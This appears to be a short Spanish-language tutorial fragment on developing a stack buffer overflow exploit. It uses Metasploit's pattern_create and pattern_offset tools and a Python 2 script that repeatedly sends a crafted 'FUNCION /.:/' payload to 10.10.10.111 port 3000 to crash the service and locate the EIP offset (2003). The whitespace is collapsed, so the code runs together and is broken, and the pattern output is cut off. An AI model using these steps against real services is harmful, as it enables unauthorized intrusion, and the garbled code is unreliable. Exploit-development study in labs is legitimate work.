/usr/share/metasploit-framework/tools/exploit/pattern_create.rb-l3800## EL valor 3800 es el valor del en donde crasheo (3500) mas 300 bytes mas.output:Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9AAi2Ai3Ai4---RESUMED
#!/usr/bin/python2.7import sys, socketoffset ="RESULTADO DE COMANDO ANTERIOR"whileTrue:try: s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('10.10.10.111',3000)) s.send(('FUNCION /.:/'+ offset)) s.close()except:print"Error connecting to server" sys.exit()
Si crasheo automaticamente es porque esta bien el valor del patron generado con el Offset.
Ahora se debe utilizar dicho patrón anterior y TOMAR el valor del EIP obtenido en el Imunity Debugger para generar un nuevo patron de offset:
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb-l3800-q386F4337#(EIP del Immunity Debbuger)[*] Exact match at offset 2003